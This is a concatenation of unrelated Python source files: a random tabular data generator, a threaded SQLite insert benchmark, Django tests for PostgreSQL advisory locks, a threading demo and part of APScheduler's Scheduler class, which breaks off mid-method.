    ALLOWED_TYPES = ['TINYINT', 'SMALLINT', 'INT', 'BIGINT',
                     'FLOAT', 'DOUBLE', 'DECIMAL',
                     'VARCHAR', 'TEXT',
                     'DATE', 'TIMESTAMP'
                     ]
    SIZE_PERFILE = 10 * 1024 * 1024  # 10 MB per file when sizing by bytes
    CONSTRAINTS = {
        'DECIMAL_PRECISION': 5,
        'DECIMAL_SCALE': 2,
        'VARCHAR_MIN': 6,
        'VARCHAR_MAX': 20,
        'TEXT_MIN': 21,
        'TEXT_MAX': 99,
        'DAYS_AGO': 1095,
        'DATE_FORMAT': '%Y-%m-%d',
        'TIMESTAMP_FORMAT': '%Y-%m-%d %H:%M:%S'
    }
    # Value generators, eval'd per cell inside write2file(). They reference
    # `self` and the random/datetime helpers from this module's namespace.
    # NOTE: eval of fixed literals only -- never extend with external input.
    FUNC = {
        'NUMBER': "randint(1, 2**2**6)",
        'TINYINT': "randint(1, 2**2**3)",
        'SMALLINT': "randint(2**2**3, 2**2**4)",
        'INT': "randint(2**2**4, 2**2**5)",
        'BIGINT': "randint(2**2**5, 2**2**6)",
        'FLOAT': "round(uniform(1, 100), randint(1, 6))",
        'DOUBLE': "round(uniform(1, 1000), randint(7, 15))",
        'DECIMAL': "format(uniform(int('1' + '0' * (self.CONSTRAINTS['DECIMAL_PRECISION'] - self.CONSTRAINTS['DECIMAL_SCALE'] - 1)), int('1' + '0' * (self.CONSTRAINTS['DECIMAL_PRECISION'] - self.CONSTRAINTS['DECIMAL_SCALE'])) - 1), '.' + str(self.CONSTRAINTS['DECIMAL_SCALE']) + 'f')",
        'VARCHAR': "''.join(choice(string.ascii_lowercase) for _ in range(randint(self.CONSTRAINTS['VARCHAR_MIN'], self.CONSTRAINTS['VARCHAR_MAX'])))",
        'TEXT': "''.join(choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in range(randint(self.CONSTRAINTS['TEXT_MIN'], self.CONSTRAINTS['TEXT_MAX'])))",
        'DATE': "datetime.strftime(datetime.today() - timedelta(randint(1, self.CONSTRAINTS['DAYS_AGO'])), self.CONSTRAINTS['DATE_FORMAT'])",
        'TIMESTAMP': "datetime.strftime(datetime.now() - timedelta(days=randint(1, self.CONSTRAINTS['DAYS_AGO']), hours=randint(1, 23), minutes=randint(1, 59), seconds=randint(1, 59)), self.CONSTRAINTS['TIMESTAMP_FORMAT'])"
    }

    def __init__(self, args):
        """Read the parsed CLI namespace and precompute generation parameters."""
        self.delimiter = '\t' if args.DELIMITER == 't' else args.DELIMITER
        if args.SIZE:
            self.use_size = True
            try:
                self.size = int(args.SIZE)
            except ValueError:
                # "<digits><unit>" form, e.g. 500M
                unit = args.SIZE[-1:].upper()
                try:
                    magnitude = int(args.SIZE[:-1])
                except ValueError:
                    raise Exception(
                        "Invalid Size Argument. Size argument must be of the pattern <digits><unit>. Ex: 1000G")
                if unit not in self.ALLOWED_UNITS:
                    # The original left self.size unset here, failing later.
                    raise Exception("Invalid Size Argument. Valid Units are K, M, G, T")
                self.size = magnitude * 1024 ** (self.ALLOWED_UNITS.index(unit) + 1)
            self.size = int(round(self.size, -1))  # Rounding it to the nearest 10
        else:
            self.use_size = False
        self.num_records = args.NUM_RECORDS
        self.num_columns = args.NUM_COLUMNS
        if args.NUM_FILES:
            self.num_files = args.NUM_FILES
            # Small outputs always collapse to a single file.
            if not self.use_size:
                if self.num_records < 1001:
                    self.num_files = 1
            elif self.size < self.SIZE_PERFILE:
                self.num_files = 1
        elif not self.use_size:
            # ~1000 records per file (integer division keeps this an int).
            self.num_files = 1 if self.num_records < 1001 else self.num_records // 1000
        else:
            self.num_files = 1 if self.size < self.SIZE_PERFILE else self.size // self.SIZE_PERFILE
        self.target_path = os.path.abspath(args.TARGET_PATH)
        self.file_prefix = args.FILE_PREFIX
        self.file_suffix = args.FILE_SUFFIX
        self.compression_enabled = args.compress
        if self.compression_enabled:
            self.file_suffix = self.file_suffix + '.gz'
        # Threading options were read by generate() but never stored before.
        self.threading_enabled = getattr(args, 'threaded', False)
        self.num_threads = getattr(args, 'NUM_THREADS', None) or 1
        self.HEADERS = ['field' + str(n) for n in range(1, self.num_columns + 1)]
        self.FIELDLIST = self.get_fieldlist()

    def check_storage(self):
        """Verify free space (when sizing by bytes) and write permission on the
        target directory.

        :raises Exception: on insufficient space or missing write permission
        """
        # os.statvfs is POSIX-only; skip the space check where unavailable.
        if self.use_size and hasattr(os, 'statvfs'):
            stats = os.statvfs(self.target_path)
            free_space = int(round(stats.f_bsize * stats.f_bavail, -1))
            if self.size > free_space:
                raise Exception("Insufficient Space. Required: %d Bytes, Available: %d Bytes" % (self.size, free_space))
        tmpfile = os.path.join(self.target_path, 'datagen.tmp')
        try:
            with open(tmpfile, 'w') as tfile:
                tfile.write('Test File for Write Access')
            os.remove(tmpfile)
        except IOError:
            raise Exception('Permission Denied: %s' % self.target_path)

    def update_constraints(self, constraints):
        """Override entries of CONSTRAINTS with user-supplied values.

        Keys are processed in reverse-sorted order so each ``*_MIN`` / SCALE
        value is applied before the matching ``*_MAX`` / PRECISION value is
        validated against it.
        """
        def integerize(i, key):
            # Everything except the two format strings must be an integer.
            try:
                return int(i)
            except ValueError:
                raise Exception('%s must be an integer' % key)

        for k, v in sorted(constraints.items(), key=operator.itemgetter(0), reverse=True):
            key = k.upper()
            if key not in ['DATE_FORMAT', 'TIMESTAMP_FORMAT']:
                v = integerize(v, k)
            if key == 'DECIMAL_PRECISION':
                if v <= self.CONSTRAINTS['DECIMAL_SCALE']:
                    raise Exception(
                        'DECIMAL_PRECISION constraint cannot be less than or equal to DECIMAL_SCALE')
            elif key == 'TEXT_MAX':
                if v < self.CONSTRAINTS['TEXT_MIN']:
                    raise Exception('TEXT_MAX constraint cannot be less than TEXT_MIN')
            elif key == 'VARCHAR_MAX':
                if v < self.CONSTRAINTS['VARCHAR_MIN']:
                    raise Exception('VARCHAR_MAX constraint cannot be less than VARCHAR_MIN')
            self.CONSTRAINTS[key] = v

    def get_fieldlist(self):
        """Pick a random column type for each of the configured columns."""
        return [choice(self.ALLOWED_TYPES) for _ in range(self.num_columns)]

    def write2file(self, fp, max_perfile):
        """Append randomly generated rows to ``fp``.

        :param fp: path of the output file
        :param max_perfile: byte budget when sizing by bytes, otherwise a
            row count
        """
        nrows_threshold = 100000  # rows generated/written per flush

        def writer(nrows):
            rows = [[eval(self.FUNC[f]) for f in self.FIELDLIST]
                    for _ in range(nrows)]
            # Text mode with newline='' as the csv module requires.
            if self.compression_enabled:
                datafile = gzip.open(fp, 'at', newline='')
            else:
                datafile = open(fp, 'a', newline='')
            try:
                csv.writer(datafile, delimiter=self.delimiter).writerows(rows)
            finally:
                datafile.close()

        if self.use_size:
            # Write in chunks until the file reaches its byte budget.
            while True:
                writer(nrows_threshold)
                if os.path.getsize(fp) >= max_perfile:
                    break
        else:
            remaining = max_perfile
            while remaining:
                chunk = min(remaining, nrows_threshold)
                writer(chunk)
                remaining -= chunk

    def generate(self):
        """Create ``num_files`` data files, optionally from worker threads."""
        if self.use_size:
            max_perfile = self.size // self.num_files
        else:
            max_perfile = self.num_records // self.num_files
        if self.threading_enabled:
            # Launch at most num_threads writers at a time, batch by batch.
            remaining = self.num_files
            stop = 1
            while remaining:
                start = stop
                batch = min(self.num_threads, remaining)
                stop = start + batch
                remaining -= batch
                threads = []
                for f in range(start, stop):
                    fp = os.path.join(self.target_path, self.file_prefix + str(f) + self.file_suffix)
                    threads.append(Thread(target=self.write2file, args=(fp, max_perfile,)))
                for thread in threads:
                    thread.start()
                for thread in threads:
                    thread.join()
        else:
            for f in range(1, self.num_files + 1):
                fp = os.path.join(self.target_path, self.file_prefix + str(f) + self.file_suffix)
                self.write2file(fp, max_perfile)
if __name__ == '__main__':
    import json  # local import: only needed for CLI parsing of --constraints

    argparser = ArgumentParser()
    argparser.add_argument("-d", "--delimiter",
                           dest="DELIMITER",
                           type=str,
                           default=",",
                           help="delimiter to separate the columns.")
    argparser.add_argument("-s", "--size",
                           dest="SIZE",
                           help="total size of data to generate. Takes precedence over records parameter.")
    argparser.add_argument("-r", "--records",
                           dest="NUM_RECORDS",
                           type=int,
                           default=1000,
                           help="total number of records to generate. Will not be used if size parameter is specified.")
    argparser.add_argument("-c", "--columns",
                           dest="NUM_COLUMNS",
                           type=int,
                           default=10,
                           help="number of required columns")
    argparser.add_argument("-f", "--files",
                           dest="NUM_FILES",
                           type=int,
                           help="number of files to generate")
    argparser.add_argument("--target-dir",
                           dest="TARGET_PATH",
                           default=os.path.dirname(__file__),
                           help="path to store the generated files")
    argparser.add_argument("--prefix",
                           dest="FILE_PREFIX",
                           default="datagen_file_",
                           help="filenames should start with")
    argparser.add_argument("--suffix",
                           dest="FILE_SUFFIX",
                           default="",
                           help="filenames should end with")
    argparser.add_argument("--compress",
                           action="store_true",
                           help="Gzip compress the generated files")
    argparser.add_argument("--threaded",
                           action="store_true",
                           help="run multiple threads")
    argparser.add_argument("-t", "--threads",
                           dest="NUM_THREADS",
                           type=int,
                           default=1,
                           help="number of threads to use")
    # type=dict rejected every possible value; parse the option as JSON instead.
    argparser.add_argument("--constraints",
                           dest="DATA_CONSTRAINTS",
                           type=json.loads,
                           help="JSON dictionary of custom data format and length. Allowed keys are "
                                "DECIMAL_PRECISION, DECIMAL_SCALE, VARCHAR_MIN, VARCHAR_MAX, TEXT_MIN, TEXT_MAX, "
                                "DAYS_AGO, DATE_FORMAT, TIMESTAMP_FORMAT.")
    # Parse exactly once (the original parsed twice and discarded the first result).
    options = argparser.parse_args()
    datagen = DataGen(options)
    if options.DATA_CONSTRAINTS:
        # Apply user-supplied overrides before generating (previously ignored).
        datagen.update_constraints(options.DATA_CONSTRAINTS)
    datagen.generate()
|
threaded_batched.py | """ batched, sqlite3 optimised and multi threaded version.
This version builds on sqlite3_opt_batched.py, but this one is multithreaded and probably the most complex of the Python variants.
We have a queue, spawn a single writer thread which consumes from queue and writes to SQLite. Then we spawn few more producer threads
which generate the data, push to queue.
previous: sqlite3_opt_batched.py
"""
import queue
import sqlite3
import threading
import multiprocessing
from typing import List
from commons import get_random_age, get_random_active, get_random_bool, get_random_area_code, create_table
# SQLite database file written by the single consumer thread.
DB_NAME = "threaded_batched.db"
# Unbounded handoff queue: producers put (insert_stmt, row_batch) tuples,
# the consumer drains them; q.join() in main() waits until all are written.
q = queue.Queue()
def consumer():
    """Single writer thread: drain (stmt, batch) pairs from the queue into
    SQLite forever, one transaction per batch."""
    connection = sqlite3.connect(DB_NAME, isolation_level=None)
    # Trade durability for raw insert speed -- acceptable for a benchmark DB.
    for pragma in ('PRAGMA journal_mode = OFF;',
                   'PRAGMA synchronous = 0;',
                   'PRAGMA cache_size = 1000000;',  # give it a GB
                   'PRAGMA locking_mode = EXCLUSIVE;',
                   'PRAGMA temp_store = MEMORY;'):
        connection.execute(pragma)
    create_table(connection)
    while True:
        stmt, batch = q.get()
        connection.execute('BEGIN')
        connection.executemany(stmt, batch)
        connection.commit()
        q.task_done()
def producer(count: int):
    """Generate ``count`` rows in million-row batches and push each batch,
    together with its matching INSERT statement, onto the shared queue."""
    batch_size = 1_000_000
    for _ in range(count // batch_size):
        # One coin flip per batch decides whether the area column is filled.
        has_area = get_random_bool()
        rows = []
        for _ in range(batch_size):
            age = get_random_age()
            active = get_random_active()
            if has_area:
                # random 6 digit number
                rows.append((get_random_area_code(), age, active))
            else:
                rows.append((age, active))
        stmt = ('INSERT INTO user VALUES (NULL,?,?,?)' if has_area
                else 'INSERT INTO user VALUES (NULL,NULL,?,?)')
        q.put((stmt, rows))
def main():
    """Spawn one daemon writer plus a pool of producers and block until every
    queued batch has been committed."""
    total_rows = 100_000_000
    # start the consumer. Marks this thread as daemon thread. Our main / program exits only
    # when the consumer thread has returned
    # https://docs.python.org/3.8/library/threading.html#thread-objects
    threading.Thread(target=consumer, daemon=True).start()
    # We keep two threads free (main + consumer) but must never drop to zero
    # producers: on 1-2 core machines cpu_count()-2 is <= 0, which previously
    # caused a ZeroDivisionError below and an empty producer pool.
    max_producers = max(1, multiprocessing.cpu_count() - 2)
    # how many rows each producer should produce
    each_producer_count = total_rows // max_producers
    producer_threads: List[threading.Thread] = [
        threading.Thread(target=producer, args=(each_producer_count,))
        for _ in range(max_producers)
    ]
    for p in producer_threads:
        p.start()
    for p in producer_threads:
        p.join()
    # Wait until the consumer has task_done()'d every queued batch.
    q.join()
if __name__ == '__main__':
    # Entry point: run the threaded batched-insert benchmark.
    main()
|
test_advisory_lock.py | from contextlib import contextmanager
from multiprocessing import get_all_start_methods
from multiprocessing import get_start_method
from multiprocessing import Pipe
from multiprocessing import Process
from multiprocessing import set_start_method
from time import sleep
from django.db import transaction
from django.test.testcases import SimpleTestCase
from django_concurrent_tests.management.commands.concurrent_call_wrapper import use_test_databases
from mock import mock
from mock import patch
from pytest import mark
from pytest import raises
from contentcuration.db.advisory_lock import advisory_lock
from contentcuration.db.advisory_lock import AdvisoryLockBusy
from contentcuration.db.advisory_lock import execute_lock
from contentcuration.db.advisory_lock import try_advisory_lock
TEST_LOCK = 1337
# flake8 doesn't like the parameterized formatting
# flake8: noqa
@mark.parametrize("key1, key2, unlock, session, shared, wait, expected_query", [
    # transaction level
    (1, None, False, False, False, True, "SELECT pg_advisory_xact_lock(%s) AS lock;"),
    (3, None, False, False, True, True, "SELECT pg_advisory_xact_lock_shared(%s) AS lock;"),
    (4, None, False, False, True, False, "SELECT pg_try_advisory_xact_lock_shared(%s) AS lock;"),
    (5, None, False, False, False, False, "SELECT pg_try_advisory_xact_lock(%s) AS lock;"),
    (6, 1, False, False, False, True, "SELECT pg_advisory_xact_lock(%s, %s) AS lock;"),
    (7, 2, False, False, True, True, "SELECT pg_advisory_xact_lock_shared(%s, %s) AS lock;"),
    (8, 3, False, False, True, False, "SELECT pg_try_advisory_xact_lock_shared(%s, %s) AS lock;"),
    (9, 4, False, False, False, False, "SELECT pg_try_advisory_xact_lock(%s, %s) AS lock;"),
    # session level
    (10, None, False, True, False, True, "SELECT pg_advisory_lock(%s) AS lock;"),
    (11, None, True, True, False, True, "SELECT pg_advisory_unlock(%s) AS lock;"),
    (12, None, False, True, True, True, "SELECT pg_advisory_lock_shared(%s) AS lock;"),
    (13, None, True, True, True, True, "SELECT pg_advisory_unlock_shared(%s) AS lock;"),
    (14, None, False, True, False, False, "SELECT pg_try_advisory_lock(%s) AS lock;"),
    (15, None, True, True, False, False, "SELECT pg_try_advisory_unlock(%s) AS lock;"),
    (16, None, False, True, True, False, "SELECT pg_try_advisory_lock_shared(%s) AS lock;"),
    (17, None, True, True, True, False, "SELECT pg_try_advisory_unlock_shared(%s) AS lock;"),
    (18, 1, False, True, False, True, "SELECT pg_advisory_lock(%s, %s) AS lock;"),
    (19, 2, True, True, False, True, "SELECT pg_advisory_unlock(%s, %s) AS lock;"),
    (20, 3, False, True, True, True, "SELECT pg_advisory_lock_shared(%s, %s) AS lock;"),
    (21, 4, True, True, True, True, "SELECT pg_advisory_unlock_shared(%s, %s) AS lock;"),
    (22, 5, False, True, False, False, "SELECT pg_try_advisory_lock(%s, %s) AS lock;"),
    (23, 6, True, True, False, False, "SELECT pg_try_advisory_unlock(%s, %s) AS lock;"),
    (24, 7, False, True, True, False, "SELECT pg_try_advisory_lock_shared(%s, %s) AS lock;"),
    (25, 8, True, True, True, False, "SELECT pg_try_advisory_unlock_shared(%s, %s) AS lock;"),
])
def test_execute_lock(key1, key2, unlock, session, shared, wait, expected_query):
    """execute_lock must emit the pg_advisory_* statement matching its flags."""
    with patch("contentcuration.db.advisory_lock.connection") as conn:
        cursor = mock.Mock()
        conn.cursor.return_value.__enter__.return_value = cursor
        # in_atomic_block is an attribute, not a method: the old line set
        # `.return_value` on it, leaving the attribute an always-truthy Mock.
        # Assign it directly (as test_execute_lock__not_implemented does):
        # transaction-level locks need an atomic block, session-level don't.
        conn.in_atomic_block = not session
        cursor.execute.return_value = True
        with execute_lock(key1, key2=key2, unlock=unlock, session=session, shared=shared, wait=wait) as c:
            assert c == cursor

        expected_params = [key1]
        if key2 is not None:
            expected_params.append(key2)

        query, params = cursor.execute.call_args_list[0][0]
        assert query == expected_query
        assert params == expected_params
@mark.parametrize("unlock, in_atomic_block", [
    (False, False),
    (True, False),
    (True, True),
])
def test_execute_lock__not_implemented(unlock, in_atomic_block):
    """Unlock/atomic-state combinations that execute_lock refuses to support."""
    with patch("contentcuration.db.advisory_lock.connection") as conn:
        conn.in_atomic_block = in_atomic_block
        with raises(NotImplementedError):
            lock_cm = execute_lock(99, key2=99, unlock=unlock,
                                   session=False, shared=False, wait=False)
            with lock_cm:
                pass
# Sentinel messages exchanged over the Pipe between parent and child process.
START_SIGNAL = 'START_SIGNAL'
END_SIGNAL = 'END_SIGNAL'
# Delay in seconds used while polling for a signal / holding the lock.
SLEEP_SEC = 0.1
def wait_for(conn, signal):
    """Block until ``signal`` arrives on pipe ``conn``, discarding any other
    messages (with a short pause between reads)."""
    while conn.recv() != signal:
        sleep(SLEEP_SEC)
def child_lock(conn, shared):
    """Child-process target: acquire TEST_LOCK inside a transaction and hold
    it until the parent sends END_SIGNAL over the pipe ``conn``."""
    # make sure we're connecting to the test database
    use_test_databases()
    with transaction.atomic():
        advisory_lock(TEST_LOCK, shared=shared)
        sleep(SLEEP_SEC)
        # Tell the parent the lock is held, then keep the transaction (and
        # therefore the lock) open until the parent signals END.
        conn.send(START_SIGNAL)
        wait_for(conn, END_SIGNAL)
# set to spawn, otherwise process would inherit connections, meaning queries would still be in
# the same transaction. If we can't use spawn, then we'll mark the test skipped
skipped = True
start_method = get_start_method(allow_none=True)
if start_method == "spawn":
    skipped = False
elif start_method is None and "spawn" in get_all_start_methods():
    # No start method chosen yet and spawn is available: select it for this run.
    set_start_method("spawn")
    skipped = False
@mark.skipif(skipped, reason="Requires spawn capability")
class AdvisoryLockDatabaseTest(SimpleTestCase):
    """
    Test case that creates simultaneous locking situations
    """
    # this test manages its own transactions
    allow_database_queries = True

    @contextmanager
    def child_lock(self, shared=False):
        """Spawn a child process that holds TEST_LOCK for the duration of the
        ``with`` body, yielding the parent end of the pipe."""
        parent_conn, child_conn = Pipe()
        p = Process(target=child_lock, args=(child_conn, shared))
        p.start()
        try:
            with transaction.atomic():
                # Wait until the child confirms it actually holds the lock.
                wait_for(parent_conn, START_SIGNAL)
                yield parent_conn
        finally:
            # Always release the child, even if the body raised.
            parent_conn.send(END_SIGNAL)
            p.join(2)

    @mark.timeout(30)
    def test_shared(self):
        """Two shared locks on the same key may coexist."""
        with self.child_lock(shared=True):
            # this won't raise an error because shared mode should allow
            # both locks simultaneously
            try_advisory_lock(TEST_LOCK, shared=True)

    @mark.timeout(30)
    def test_try__busy(self):
        """An exclusive lock held elsewhere makes try_advisory_lock raise."""
        with self.child_lock(shared=False):
            # since the lock should already be acquired, this will raise the error
            with raises(AdvisoryLockBusy):
                try_advisory_lock(TEST_LOCK)
|
ex4_sample.py | import logging
import threading
import time
def thread_function(name):
    """Worker body for the demo: log entry, sleep two seconds to stand in for
    real work, then log exit."""
    log = logging.info
    log("Thread %s: starting", name)
    time.sleep(2)
    log("Thread %s: finishing", name)
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
# x.join()
logging.info("Main : all done")
|
scheduler.py | """
This module is the main part of the library. It houses the Scheduler class
and related exceptions.
"""
from threading import Thread, Event, Lock
from datetime import datetime, timedelta
from logging import getLogger
import os
import sys
from apscheduler.util import *
from apscheduler.triggers import SimpleTrigger, IntervalTrigger, CronTrigger
from apscheduler.jobstores.ram_store import RAMJobStore
from apscheduler.job import Job, MaxInstancesReachedError
from apscheduler.events import *
from apscheduler.threadpool import ThreadPool
logger = getLogger(__name__)
class SchedulerAlreadyRunningError(Exception):
    """Signals that the scheduler was asked to start or reconfigure while it
    was still running."""

    def __str__(self):
        return 'Scheduler is already running'
class Scheduler(object):
"""
This class is responsible for scheduling jobs and triggering
their execution.
"""
_stopped = True
_thread = None
def __init__(self, gconfig={}, **options):
self._wakeup = Event()
self._jobstores = {}
self._jobstores_lock = Lock()
self._listeners = []
self._listeners_lock = Lock()
self._pending_jobs = []
self.configure(gconfig, **options)
def configure(self, gconfig={}, **options):
"""
Reconfigures the scheduler with the given options. Can only be done
when the scheduler isn't running.
"""
if self.running:
raise SchedulerAlreadyRunningError
# Set general options
config = combine_opts(gconfig, 'apscheduler.', options)
self.misfire_grace_time = int(config.pop('misfire_grace_time', 1))
self.coalesce = asbool(config.pop('coalesce', True))
self.daemonic = asbool(config.pop('daemonic', True))
self.standalone = asbool(config.pop('standalone', False))
# Configure the thread pool
if 'threadpool' in config:
self._threadpool = maybe_ref(config['threadpool'])
else:
threadpool_opts = combine_opts(config, 'threadpool.')
self._threadpool = ThreadPool(**threadpool_opts)
# Configure job stores
jobstore_opts = combine_opts(config, 'jobstore.')
jobstores = {}
for key, value in jobstore_opts.items():
store_name, option = key.split('.', 1)
opts_dict = jobstores.setdefault(store_name, {})
opts_dict[option] = value
for alias, opts in jobstores.items():
classname = opts.pop('class')
cls = maybe_ref(classname)
jobstore = cls(**opts)
self.add_jobstore(jobstore, alias, True)
def start(self):
"""
Starts the scheduler in a new thread.
In threaded mode (the default), this method will return immediately
after starting the scheduler thread.
In standalone mode, this method will block until there are no more
scheduled jobs.
"""
if self.running:
raise SchedulerAlreadyRunningError
# Create a RAMJobStore as the default if there is no default job store
if not 'default' in self._jobstores:
self.add_jobstore(RAMJobStore(), 'default', True)
# Schedule all pending jobs
for job, jobstore in self._pending_jobs:
self._real_add_job(job, jobstore, False)
del self._pending_jobs[:]
self._stopped = False
if self.standalone:
self._main_loop()
else:
self._thread = Thread(target=self._main_loop, name='APScheduler')
self._thread.setDaemon(self.daemonic)
self._thread.start()
def shutdown(self, wait=True, shutdown_threadpool=True,
close_jobstores=True):
"""
Shuts down the scheduler and terminates the thread.
Does not interrupt any currently running jobs.
:param wait: ``True`` to wait until all currently executing jobs have
finished (if ``shutdown_threadpool`` is also ``True``)
:param shutdown_threadpool: ``True`` to shut down the thread pool
:param close_jobstores: ``True`` to close all job stores after shutdown
"""
if not self.running:
return
self._stopped = True
self._wakeup.set()
# Shut down the thread pool
if shutdown_threadpool:
self._threadpool.shutdown(wait)
# Wait until the scheduler thread terminates
if self._thread:
self._thread.join()
# Close all job stores
if close_jobstores:
for jobstore in itervalues(self._jobstores):
jobstore.close()
@property
def running(self):
thread_alive = self._thread and self._thread.isAlive()
standalone = getattr(self, 'standalone', False)
return not self._stopped and (standalone or thread_alive)
def add_jobstore(self, jobstore, alias, quiet=False):
"""
Adds a job store to this scheduler.
:param jobstore: job store to be added
:param alias: alias for the job store
:param quiet: True to suppress scheduler thread wakeup
:type jobstore: instance of
:class:`~apscheduler.jobstores.base.JobStore`
:type alias: str
"""
self._jobstores_lock.acquire()
try:
if alias in self._jobstores:
raise KeyError('Alias "%s" is already in use' % alias)
self._jobstores[alias] = jobstore
jobstore.load_jobs()
finally:
self._jobstores_lock.release()
# Notify listeners that a new job store has been added
self._notify_listeners(JobStoreEvent(EVENT_JOBSTORE_ADDED, alias))
# Notify the scheduler so it can scan the new job store for jobs
if not quiet:
self._wakeup.set()
def remove_jobstore(self, alias, close=True):
"""
Removes the job store by the given alias from this scheduler.
:param close: ``True`` to close the job store after removing it
:type alias: str
"""
self._jobstores_lock.acquire()
try:
jobstore = self._jobstores.pop(alias)
if not jobstore:
raise KeyError('No such job store: %s' % alias)
finally:
self._jobstores_lock.release()
# Close the job store if requested
if close:
jobstore.close()
# Notify listeners that a job store has been removed
self._notify_listeners(JobStoreEvent(EVENT_JOBSTORE_REMOVED, alias))
def add_listener(self, callback, mask=EVENT_ALL):
"""
Adds a listener for scheduler events. When a matching event occurs,
``callback`` is executed with the event object as its sole argument.
If the ``mask`` parameter is not provided, the callback will receive
events of all types.
:param callback: any callable that takes one argument
:param mask: bitmask that indicates which events should be listened to
"""
self._listeners_lock.acquire()
try:
self._listeners.append((callback, mask))
finally:
self._listeners_lock.release()
def remove_listener(self, callback):
"""
Removes a previously added event listener.
"""
self._listeners_lock.acquire()
try:
for i, (cb, _) in enumerate(self._listeners):
if callback == cb:
del self._listeners[i]
finally:
self._listeners_lock.release()
def _notify_listeners(self, event):
self._listeners_lock.acquire()
try:
listeners = tuple(self._listeners)
finally:
self._listeners_lock.release()
for cb, mask in listeners:
if event.code & mask:
try:
cb(event)
except:
logger.exception('Error notifying listener')
def _real_add_job(self, job, jobstore, wakeup):
job.compute_next_run_time(datetime.now())
if not job.next_run_time:
raise ValueError('Not adding job since it would never be run')
self._jobstores_lock.acquire()
try:
try:
store = self._jobstores[jobstore]
except KeyError:
raise KeyError('No such job store: %s' % jobstore)
store.add_job(job)
finally:
self._jobstores_lock.release()
# Notify listeners that a new job has been added
event = JobStoreEvent(EVENT_JOBSTORE_JOB_ADDED, jobstore, job)
self._notify_listeners(event)
logger.info('Added job "%s" to job store "%s"', job, jobstore)
# Notify the scheduler about the new job
if wakeup:
self._wakeup.set()
def add_job(self, trigger, func, args, kwargs, jobstore='default',
**options):
"""
Adds the given job to the job list and notifies the scheduler thread.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param trigger: trigger that determines when ``func`` is called
:param func: callable to run at the given time
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param jobstore: alias of the job store to store the job in
:rtype: :class:`~apscheduler.job.Job`
"""
job = Job(trigger, func, args or [], kwargs or {},
options.pop('misfire_grace_time', self.misfire_grace_time),
options.pop('coalesce', self.coalesce), **options)
if not self.running:
self._pending_jobs.append((job, jobstore))
logger.info('Adding job tentatively -- it will be properly '
'scheduled when the scheduler starts')
else:
self._real_add_job(job, jobstore, True)
return job
def _remove_job(self, job, alias, jobstore):
jobstore.remove_job(job)
# Notify listeners that a job has been removed
event = JobStoreEvent(EVENT_JOBSTORE_JOB_REMOVED, alias, job)
self._notify_listeners(event)
logger.info('Removed job "%s"', job)
def add_date_job(self, func, date, args=None, kwargs=None, **options):
"""
Schedules a job to be completed on a specific date and time.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run at the given time
:param date: the date/time to run the job at
:param name: name of the job
:param jobstore: stored the job in the named (or given) job store
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:type date: :class:`datetime.date`
:rtype: :class:`~apscheduler.job.Job`
"""
trigger = SimpleTrigger(date)
return self.add_job(trigger, func, args, kwargs, **options)
def add_interval_job(self, func, weeks=0, days=0, hours=0, minutes=0,
seconds=0, start_date=None, args=None, kwargs=None,
**options):
"""
Schedules a job to be completed on specified intervals.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run
:param weeks: number of weeks to wait
:param days: number of days to wait
:param hours: number of hours to wait
:param minutes: number of minutes to wait
:param seconds: number of seconds to wait
:param start_date: when to first execute the job and start the
counter (default is after the given interval)
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param name: name of the job
:param jobstore: alias of the job store to add the job to
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:rtype: :class:`~apscheduler.job.Job`
"""
interval = timedelta(weeks=weeks, days=days, hours=hours,
minutes=minutes, seconds=seconds)
trigger = IntervalTrigger(interval, start_date)
return self.add_job(trigger, func, args, kwargs, **options)
    def add_cron_job(self, func, year=None, month=None, day=None, week=None,
                     day_of_week=None, hour=None, minute=None, second=None,
                     start_date=None, args=None, kwargs=None, **options):
        """
        Schedules a job to be completed on times that match the given
        expressions.

        Any extra keyword arguments are passed along to the constructor of the
        :class:`~apscheduler.job.Job` class (see :ref:`job_options`).

        :param func: callable to run
        :param year: year to run on
        :param month: month to run on
        :param day: day of month to run on
        :param week: week of the year to run on
        :param day_of_week: weekday to run on (0 = Monday)
        :param hour: hour to run on
        :param minute: minute to run on
        :param second: second to run on
        :param start_date: earliest date/time at which the job may first run
        :param args: list of positional arguments to call func with
        :param kwargs: dict of keyword arguments to call func with
        :param name: name of the job
        :param jobstore: alias of the job store to add the job to
        :param misfire_grace_time: seconds after the designated run time that
            the job is still allowed to be run
        :return: the scheduled job
        :rtype: :class:`~apscheduler.job.Job`
        """
        trigger = CronTrigger(year=year, month=month, day=day, week=week,
                              day_of_week=day_of_week, hour=hour,
                              minute=minute, second=second,
                              start_date=start_date)
        return self.add_job(trigger, func, args, kwargs, **options)
def cron_schedule(self, **options):
"""
Decorator version of :meth:`add_cron_job`.
This decorator does not wrap its host function.
Unscheduling decorated functions is possible by passing the ``job``
attribute of the scheduled function to :meth:`unschedule_job`.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
"""
def inner(func):
func.job = self.add_cron_job(func, **options)
return func
return inner
def interval_schedule(self, **options):
"""
Decorator version of :meth:`add_interval_job`.
This decorator does not wrap its host function.
Unscheduling decorated functions is possible by passing the ``job``
attribute of the scheduled function to :meth:`unschedule_job`.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
"""
def inner(func):
func.job = self.add_interval_job(func, **options)
return func
return inner
def get_jobs(self):
"""
Returns a list of all scheduled jobs.
:return: list of :class:`~apscheduler.job.Job` objects
"""
self._jobstores_lock.acquire()
try:
jobs = []
for jobstore in itervalues(self._jobstores):
jobs.extend(jobstore.jobs)
return jobs
finally:
self._jobstores_lock.release()
def unschedule_job(self, job):
